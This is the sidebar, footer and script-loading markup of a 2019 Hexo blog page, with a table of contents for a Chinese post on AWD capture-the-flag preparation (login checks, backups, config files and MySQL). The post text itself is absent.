  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">V</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#AWD"><span class="nav-number">1.</span> <span class="nav-text">AWD</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、确定环境是密码登录还是密钥登录"><span class="nav-number">1.1.</span> <span class="nav-text">1、确定环境是密码登录还是密钥登录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、迅速备份源码和数据库到本机"><span class="nav-number">1.2.</span> <span class="nav-text">2、迅速备份源码和数据库到本机</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、找配置文件-amp-mysql一些操作"><span class="nav-number">1.3.</span> <span class="nav-text">3、找配置文件&amp;mysql一些操作</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#附加"><span class="nav-number">2.</span> <span class="nav-text">附加</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">V</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
